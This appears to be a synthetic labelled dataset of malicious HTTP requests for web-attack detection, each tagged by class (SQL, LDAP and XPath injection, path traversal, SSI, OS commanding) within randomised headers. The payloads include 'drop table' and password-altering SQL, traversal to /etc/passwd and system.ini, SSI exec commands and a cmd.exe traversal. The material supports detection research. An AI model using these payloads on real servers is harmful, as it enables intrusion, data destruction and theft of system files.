UA-Disp: 915,366,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: FTP/5.7 www.tume.css:02580, 1.6 190.147.107.218
Transfer-Encoding: gzip
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37339
Start - Id: 42746
class: SqlInjection
PUT /h6Hu.jpg? HTTP/1.1
Content-Length: 186
Content-Language: nopr,bmuctue
Content-Encoding: compress
Content-Location: /voys/cntSee.jpeg
Content-MD5: YW50S3M1ZWNnODRUZGkybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Mar 05 18:16:06 UTC
Last-Modified: Fri, 29 Jun 07 07:20:58 CET
Host: www.rIanaml.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: aEp=re
Client-ip: 190.248.104.33
Cookie: peanf2remxnliCt=;alter   table trllreas     set  password  =    '6ss'   where  name   =  '1tEnk';;hpnt=9
Cookie2: $Version="3"
Date: Wed, 31 May 06 01:46:00 CET
ETag: "BOPBRVX@KsK5C5D"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Fri, 06 Oct 06 10:15:09 CET
If-Unmodified-Since: Tue, 28 Apr 09 08:00:39 UTC
If-Match: "-wJu7ZWeMJKz8yruFqQ"
If-None-Match: *
If-Range: "PoVGzvl09iBulTTBY1HF"
Max-Forwards: 012
MIME-Version: 2.2
Pragma: 6YanE=ai
Proxy-Authorization: npee tari=stsHdd
Authorization: NTLM b242YWVpZXZhdW5lZGVvYWhvdFJBRHZrbmxxdXNsaXBwT3lvaG4=
Range: -47883,920284-33663,-174
Referer: /tdgfoc8/9add.txt
TE: chunked,deflate;q=0.2
Trailer: Cache-Control
User-Agent: EKgnitdne
UA-CPU: StrongARM
UA-Disp: 430,3561,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1222x7827
Via: FTP/6.1 www.e9ejsg.shtml
Transfer-Encoding: aszn; iusi=nhn9lo
Upgrade: tgK/9.1, gaesln/8.0, 4lDidv/1.3, oiolt/7.5
Warning: 234 www.a6cau7h.css "tmiou65oosao" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

xttioi2Orrcir=5&nttavbcaqs0CTeE=iii-oe6netcat6pm3I6k&teced9=lbZ_&DjkIlSlocation=delete)2Wsaf5&hehe&eraeb=2binns&un=y&fuon&ir=ionr&tuhKPbconnectHrcopy=t6be1ceCqphprnt&JR0fscript=stk

End - Id: 42746
Start - Id: 38824
class: LdapInjection
GET /hPjmEfjC/nienTsls/a3-4Ykn8K6BJBlQ./tUjJJDgwfKNaY/5UdAnlib/eAC0ZM9/EttroshoonuH/sbnsAsre5ixen/LyHetkgf/al4aauue.css?hztdrroil=hwaiismoa&QvKMusrRtmp9m0b=ietnoitm8&isouEeatcCt=9&tHslrwre5=%40tiaite&oa8en=xde7eikGxatieqc&ledBe5mN=nec&pypastwin9p=76184&MuhpfnB=hswannr2lshoCeials&UpiEj=r&n7eAsp=xtere&lni=%29++%28+++%7C++%28t1%3DTscW2*%29&TyitysduaReeu=e HTTP/1.1
Host: 221.167.56.57
Connection: keep-alive
Accept: audio/x-wav, image/gif, application/postscript;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fenitGma-WatbeSek;q=0.2
Cache-Control: max-stale=5
Client-ip: 166.96.232.49
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="66"
Date: Mon, 02 Jun 08 11:26:21 UTC
ETag: "cFY6YafTK7wsO_G-E90N"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Wed, 23 Dec 09 23:45:29 CET
If-Unmodified-Since: Sat, 15 Dec 07 06:25:36 CET
If-Match: "jYqxnf8M4URpDXaXfYaP"
If-None-Match: "mHp.PPfxX43pmyNg"
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 38
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 55524-
Referer: /nlairwet/Fa2ato/aTOeeeai/k3KcDans/etnn.jsp
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 5.9; fr-oR; rv:6.3.5) Gecko/18229690
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: gzip
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38824
Start - Id: 45690
class: PathTransversal
GET /IuaSy7E/zoBm7SKS9-d8jNFYZT5D/mEdspg/wWtBEbiPFu/hHe6OETPgSBERWtrSXR/nnibfmecwehorsura/5qunoidh0-wDt/De/pX@XnSM@iuuaQLngTb/PPteJCe.yIYCF@/cEu3QsyEHA/r6_.aspx?e8gcyeiiOoatio8=dl&rsa=ed&eIr9rr=raceo%5Cs+hk%3A&olnoper80ne=%40lontxt%25eEo&umdao0nanyhc=ul&rdx2Ctprrydet4=oV2hTQJD&_eOpDhavingiieXftps=etwfL&obsxsloSvdat=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&poeeniiO=2rwryset0t+iu&iltsebu=oinibbgsoundioftpa&kkrwhCy7Ia3vj=a%5Cwfexec&hlinonRLrsea=Etnt&metaG9B7zZ2m=i4o HTTP/1.0
Host: www.xbcfC.net:80
Connection: eYhdaiT
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.9, identity
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="64"
Date: Mon, 04 Jul 05 08:12:26 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: ttonmd1=m6aEgHy
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Mon, 25 Oct 04 18:32:58 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 14:32:22 UTC
Max-Forwards: 3
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Digest uri=http://www.retn7h.it/rque/hisSqa/Inhbiy/stshrEnt/eOirttc.mdb
Range: -934,-807,-703421
Referer: /lexesc/uGiancSo/iedadrop/ikneef/asazg.jsp
TE: gzip;q=0.7
Trailer: If-None-Match
User-Agent: 8qiform/9.2
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: FTP/2.9 242.125.249.209
Transfer-Encoding: identity
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45690
Start - Id: 40236
class: SSI
GET /nndehu0iHoswiheth0/0EFBUaCm2vkNDbf8@@/8etv/fGadminW5PXLD8kQpassthru1H/rZUel0elq0q/xXKQeL/ouhrdieaamNsxIe/fv4deuX9auth4palmp/oe/n57vPh/sWhtpassEz.asmx? HTTP/1.0
Host: 71.124.36.81:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.8, windows-1257;q=0.0, x-mac-japanese;q=0.3, x-mac-turkish, x-mac-turkish
Accept-Encoding: <!--    #exec  cmd="c:\progra~1\deuu\1dE\no0xno.exe  d:\ls\www.ieololic.org\cN\database.mdb  /x     exporttofoxpro"-->
Accept-Language: *;q=0.1
Cache-Control: ksaex='peot'
Date: Wed, 17 Mar 04 16:40:45 UTC
Expect: bdnsmmb=B6im
If-Match: "vbfP7gq5tUQEgh.6o6"
If-None-Match: "P.zAfcfLOu0yhzz8wIsW"
If-Range: Thu, 09 Sep 04 14:01:43 GMT
Max-Forwards: 126
Pragma: tibnepa=htLhli
Authorization: NTLM aXRybGZoYXJ5OG1RZUt0YWlPQ2V4ZWt5NXd6bXNtbDBo
Referer: /fos0elzt/dt1ze/oytdat.jsp
Trailer: Accept
User-Agent: 1avne51or0nnvzotrt0c

null

End - Id: 40236
Start - Id: 48303
class: XPathInjection
GET /8ae/gqy9ln6ghtu/Asystem.D1Iors0DpEk/ryX/stadetiH/Iaftpx-9homeidy..png? HTTP/1.0
Host: www.oals7.com:80
Connection: close
Accept: image/jpeg, image/*;q=0.3, image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tetdoEo'   or    count( path/child::node()[position( )=((   i  + j   +    k    +    l + 1)]    |    path/child::*()[position()=(k+1)])=1 or  'nh'  =  '   iyeh' or
Cache-Control: no-store
Client-ip: 137.0.56.189
Cookie: ber=ym.ob1WYq;speNnkdc3nsr=eoeedivdropdhrf;isnvcbjo=1;N3uhomeXk28Ntmp=ahoeal2ossaahne
Cookie2: $Version="81"
Date: Wed, 23 Jul 08 08:10:28 GMT
ETag: "eerlUYtS7n--gSm11ozn"
Expect: nnaih4
From: mSrf3p@empeero.de
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Sun, 28 Dec 08 18:19:05 GMT
If-Match: "xMSLdiGN1HBB@LG@_"
If-None-Match: "8McCqQlFVeqvXeaS.n"
If-Range: Fri, 09 Jun 06 14:15:31 CET
Max-Forwards: 6145
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: l3mee aaieteal=Eacttno
Referer: http://www.eebhnl.fr/AteekeTd/mtSoc/isareuej.nsf
TE: deflate;q=0.5,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: 6obtjUaEhd (zPn09u4Pw; s1XreNA)
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 3.9 41.45.211.226, 3.6 113.101.31.141:24, FTP/9.7 www.oodl4nr.js:350
Transfer-Encoding: deflate
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 302 12.139.124.62 "qfuhcmikee7d" 
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 280773843
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48303
Start - Id: 41243
class: SqlInjection
GET /octguworyodnnDba/mPBSql/I0Ydi@vhHxQM4mk/0rjamiaeaSteetidE/CZyvW-zp/uifO7S/JoptZNJdiviGeXoHX7/tEAes/fi0ewkdmmwnvayd/tF7T@/ee020ewhfuyhe.mdb?ytyukle=itonosten&eZopene0VT=9646836&mr8T=tsarThlji&elydCudsttoau=u++r&reuAEdhta=njwindow.open&fulzbd7ee=nSf_WLgp&ihypdg6emo=357684586 HTTP/1.1
Host: 63.141.163.217
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: max-age=05201
Client-ip: 251.101.157.72
Cookie2: $Version="2"
Date: Fri, 17 Apr 09 03:56:51 CET
ETag: W/"qVHVETCstnO6syV"
Expect: auPvos
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: *
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: "fx.pk1bS2L0Jx--N"
Max-Forwards: 9
MIME-Version: 4.6
Pragma: d='Ioemim'
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: http://abfrum.org/aIext/cdpearh/5ithowor/hsoa/yb5ve2i.php
TE: trailers
Trailer: Warning
User-Agent: '; drop   table  Nrrnsloafu
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: identity
Upgrade: nI4c/2.6
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41243
Start - Id: 36127
class: PathTransversal
GET /u9anHI_obP8SYaN1@pKp/oparV/vbTk@a/likejg0QfrAXkmf6X/1ena/uzuItlg9CGBf/TMMnph-SAnNkoptP/eR.mspx?toh3eo=ajC&elnoiEitivdie1e=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: 88.212.46.18
Connection: keep-alive
Accept: image/*;q=0.9, text/xml;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity, compress;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 107.18.136.170
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="5"
Date: Wed, 04 Jun 08 03:16:34 UTC
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ltosnt
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 27 Jun 07 12:01:14 UTC
If-Unmodified-Since: Fri, 05 Jun 09 11:01:55 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "tb8Sol@aX43QjRt1"
If-Range: "A2JxszXcuc0p9dt-XP"
Max-Forwards: 14
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: sneew wtipeu1=scttED
Range: -549293,-6
Referer: /snptghm/rerilin/yEsfE/imamwz/teNTtaio.php3
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 1.0; ai-7h; rv:7.0.1) Gecko/10688667
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7606x3250
Via: 2.1 www.tjhi2tya.shtml, HTTP/9.6 www.ansrcm.gif, HTTP/5.3 www.aa1s.jpeg:3220
Transfer-Encoding: deflate
Upgrade: nhS/5.5, hvnd/7.0, s5HomA/4.0, gonou5/9.7, epl/7.7
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 62.96.238.58
X-Serial-Number: 5450783123933733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36127
Start - Id: 46171
class: PathTransversal
GET /faysst0.cgi?rih=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&thizeomdshsa=7292253 HTTP/1.0
Host: 218.228.255.114
Connection: keep-alive
Accept: video/quicktime, application/zip;q=0.0, audio/basic;q=0.4
Accept-Charset: iso-8859-15;q=0.7, iso-8859-15, windows-1250, x-mac-icelandic;q=0.4, windows-1251;q=0.3
Accept-Encoding: deflate;q=0.9, identity;q=0.6, deflate, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0364
Client-ip: 5.233.173.36
Cookie: ysht=ue;enycdvosodison0=901902067;e0heoceuxZg=rebn;uh3rxIe5iPr=dtrpsfazsxhuniono];innchi4o=ean1lboot.inioeta;go1uaIlsu5=23722
Cookie2: $Version="8"
Date: Wed, 06 Jul 05 08:36:48 CET
ETag: "XxIGPTgMgE9f0ZK"
Expect: 4pnWf5e
From: 6lheepoq@m7ihelwj.gov
If-Modified-Since: Fri, 17 Nov 06 02:50:28 UTC
If-Unmodified-Since: Fri, 29 Sep 06 02:11:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 9
MIME-Version: 6.1
Pragma: N4ata=s
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: Digest qop=Te7t
Range: -51066
Referer: http://www.ohoe0.com/gk4sME3/einbeNp/zwltdi/8sReu1/2ltor.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 5.7; ho-re; rv:4.9.5) Gecko/36065713
UA-CPU: StrongARM
UA-Disp: 9067,415,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.9 63.96.226.125
Transfer-Encoding: gzip
Upgrade: Dnac/5.1, hoA/3.8
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46171
Start - Id: 40708
class: SSI
PUT /iadHaeaglms2inLr/Ss3JYpasswdKf-OWBS/fStkfRohnaL.2/2.JxgxW78CsZA3E3yjB/ltreyxuitseech/cTwi/e8wtrlsdeenXrtl.gif? HTTP/1.1
Content-Length: 279
Content-Language: Ssx
Content-Encoding: deflate
Content-Location: http://9dr7uweT.cz/Aepti/slso/siyn9o.jsp
Content-MD5: ZVJ5c2VzZW9yYnM2dHdzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Nov 06 22:51:57 GMT
Last-Modified: Thu, 02 Oct 08 17:55:19 UTC
Host: 229.18.94.7
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.2, windows-1250;q=0.3, us-ascii, iso-8859-15;q=0.4, iso-8859-8
Accept-Encoding: *;q=0.5
Accept-Language: oirjonfo-o, Y-e, tg-4tCht;q=0.2
Cache-Control: no-store
Client-ip: 200.115.61.137
Cookie: unteec=ebcf@qdr4kFO;sftdhntrn=6981886;M4rIoErh7ttei=nnhdoTreky;pBAj@OHol=s9teajbsbwe<r;5aegiinsm=ihe6dropuvpmetabftmpy;sYaae6=<!--   #include virtual="c:\winnt\system.ini"  -->
Cookie2: $Version="750"
Date: Wed, 10 Mar 04 10:45:25 GMT
ETag: "rbTxTovKWreRPohJb07"
Expect: zHxlssem
If-Modified-Since: Mon, 14 Jun 04 13:58:06 GMT
If-Unmodified-Since: Sat, 04 Mar 06 10:28:04 GMT
If-Match: *
If-None-Match: "zmnl3gUKT2XZLXQGpG"
If-Range: "wHXDOvs-2vWqe1136"
MIME-Version: 5.6
Pragma: no-cache
Range: 6-8,-50918,9527-
Referer: http://www.clds.ch/lCgh/tais/aoilyeme.jsp
User-Agent: MHpogl (aO5tAcp@l; aWct2VX; biA2n@6Ak@; uJeMZmiq)
UA-CPU: 68000
Via: ohRaAA/5.2 228.127.121.50, 5.9 www.enhd.html
Transfer-Encoding: deflate
Upgrade: chpn/8.9, sie/3.3, aze/7.0, uxen/0.7
Warning: 718 www.Bosx4ea.png "oyhuehdpitot" "Sun, 30 Apr 06 04:30:12 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ooantIyofia2r=4125268&ud1dncef=Rpsh44h&3oscsojWhv=ew;dg %a&o2eqce=loand|<(&TKhaving@iE4B9d5f=75&2y0o=qkF6o4om&4e5bzo0j=2150&Is=h8isirriedeeRndpa&8drfenydqr=tayvdwp-ereo2]Ftks5+&nnfoeo=insertnk/>o&sw=589&AFQ3ipDLK=9499225&eceoZVpoIev=93&J6@inputrPm-UQ3.=th85cqgX

End - Id: 40708
Start - Id: 44192
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.3Oseesserf.biz
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.2, deflate, deflate;q=0.3
Accept-Language: *
Cache-Control: max-age=709
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Sun, 26 Dec 04 04:03:24 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Thu, 08 Dec 05 02:40:00 UTC
If-Unmodified-Since: Sun, 26 Dec 04 11:13:04 CET
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: "VOsY1E14NnShhSZ1A"
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Basic dG13bHAzYzpkbnVlMA==
Range: 22399-
Referer: http://www.neetnEsy.com/nescnus/suroz/tlrel6/pluw/evJums.gif
TE: trailers
Trailer: Referer
User-Agent: pLwbunali (eZ51Uhj; a4pEK.F8; d8Dj.pso; tggybjr; qw6OXf)
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5614x800
Via: FTP/4.4 www.8Itie.jpeg, 6.7 122.224.94.189:28, HTTP/9.0 208.217.89.106
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 029 235.65.195.127 "i3YfHit9o" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44192
Start - Id: 40011
class: SSI
GET /2yfHLGw/tODEzd/RRnullD/lz4nEPAxo.Jw3Yp4N.asmx?nabudplfaXee=vXzym7JgX&2aasi=2401169218&nvdn0o=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fls+-l+%2Fhome%2Foten4if%2Fi7orn%22++++--%3E HTTP/1.0
Host: www.soTd.net
Connection: eiii
Accept: image/*
Accept-Charset: euc-jp, iso-10646-ucs-2, macintosh
Accept-Encoding: 
Accept-Language: sd-f;q=0.1, emaso-njeilm4e;q=0.1, n-ouren
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Sun, 04 Oct 09 10:49:48 CET
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Mon, 01 Dec 08 04:21:23 GMT
If-Unmodified-Since: Thu, 31 Dec 09 24:04:13 UTC
If-Match: "l2-hGTBsWri6-Y0dE_jo"
If-None-Match: "H91kIl6VpVWo7tvds4u3"
If-Range: Fri, 13 Jan 06 18:03:33 GMT
Max-Forwards: 344
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: l6eean drgnj=ervo3i
Range: 4761-
Referer: http://itoosthl.be/oeeyeonk/v0ratEe/fntG/z3oair.js
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: hldwHa5espp
UA-CPU: Sparc
UA-Disp: 5489,849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 219x816
Via: 8.7 www.okse5no.shtml
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40011
Start - Id: 38974
class: LdapInjection
GET /aJ-xuynLx6DgeqmGnvJu/0Ieesa/e3sa7/OJ-Xd9hnetcatNoandILMt/g0YqIXivZy6/ad6/dyx3PgP59nWX.nsf?2tVdtytSa9taoR=dshas%29%28%26%28objectClass+%3D+e5er*%29 HTTP/1.1
Host: www.tfotibno.cz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 39.110.44.223
Cookie: yrTKYD=rgdsjmddTcephh4ed5
Date: Tue, 30 Oct 07 05:00:53 CET
If-Modified-Since: Thu, 03 Mar 05 06:30:20 UTC
If-Unmodified-Since: Mon, 24 Apr 06 14:56:07 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Jun 09 14:28:09 GMT
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic ZWplYTppdHJTdE0=
Range: 4-376,4029-
Referer: http://odi3.com/dtcmm/0erumi7/7eRp/sx3zeru.pl
Trailer: Max-Forwards
User-Agent: gJPEISwGj http://www.pI1slsa.com
UA-Pixels: 9003x7790
Via: dis/0.0 195.217.62.241
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 766 49.121.60.89 "llesRTdeaun22" 
X-Serial-Number: 70747450
----: ------------------------------

null

End - Id: 38974
Start - Id: 40820
class: SSI
GET /1TKXrhdFnU8Ei_sx/7n/ea1nmnewaMfdiaIoew/tCM1oZKexs0.PLAH.html?sglc19a8e2o=ed&DI_UlTg=Eh7OeoaA&Da0MlvarPDg=%3C%21--%23odbc++++connect%3D%22op8dtbz%2Cwjeh%2CaLe%22+++++++++statement%3D%22select+++++*+++from++anl%22--%3E&sx4eceudaelle8e=1isno&ljExmuteiro=SbetweensssaCx&in1eraxbpkeZ=84434&0p=ch&objectC@locationy=bost&ssyale5tu1Ia=+ihMahu&hNbsheeiirmm0a=eo+pw&0oFaVJM@LPAb=3288 HTTP/1.0
Host: 227.231.168.66
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: ectOe-itArt;q=0.4
Cache-Control: max-stale
Client-ip: 70.114.129.131
Cookie: gWdtNteOmmsne4U=if2onoan;ihgeedrwoau=$8union$kt];gjs
Cookie2: $Version="76"
Date: Sat, 27 Nov 04 18:45:42 GMT
ETag: "9Oh1CLeHaXUPTeTJ1zV"
Expect: lwro1wg
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sat, 12 Mar 05 02:41:44 CET
If-Match: "cDnudOb4RAJjbEyd"
If-None-Match: "bFwIfFTc_tTg-Gte-pq"
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: hMq3ja fer7eoa4=hAawgd
Range: 90-,846222-
Referer: http://csXaeh.net/67etoxhm/rtv5Ccor/efame/tpasl.txt
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: tYDJt8Vp http://www.vanYnlnE.com
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 047x242
Via: 0.6 www.earw.tiff, 4.0 74.72.93.92
Transfer-Encoding: identity
Upgrade: hete/2.5
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40820
Start - Id: 42956
class: OsCommanding
GET /hnihnsi/6rztihuk37.php? HTTP/1.0
Host: www.wwetl.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, identity
Accept-Language: *
Cache-Control: max-age=65069
Cookie: irh=9;toi=|   cat    /etc/passwd
Cookie2: $Version="340"
Date: Sun, 26 Mar 06 05:44:54 CET
ETag: W/"dfwVmnfK9h2fhEn1wTy"
Expect: ohdoc=nneryyAn;gSce
From: 9sarS@ifbt8.gov
If-Modified-Since: Sat, 11 Aug 07 05:57:02 CET
If-Unmodified-Since: Thu, 23 Feb 06 03:51:36 GMT
If-Match: *
If-None-Match: "Tvp3X4WXfIDrFa7"
If-Range: Thu, 21 Dec 06 18:22:55 CET
Max-Forwards: 85
MIME-Version: 5.5
Pragma: pthRn='7sae'
Proxy-Authorization: Basic M251amFvaDp6anRu
Authorization: Basic c2l0dHQ6bzlzcg==
Range: 803582-1
Referer: http://www.ofnanncT.cz/btiirtuf/pr7m.swf
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: te@bQyB http://www.bttr.de
UA-Disp: 0867,9888,32
UA-Color: color32
Via: 1.4 www.nsskoltn.gif
Transfer-Encoding: identity
Upgrade: ra4F/2.5, nr6r/2.4, ltj/8.1, osrll/1.3
Warning: 188 206.78.250.6 "rfstcWcoouvsl" "Mon, 24 Jan 05 04:09:16 UTC"
X-Forwarded-For: 9.108.251.79
X-Serial-Number: 61844777851149427
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

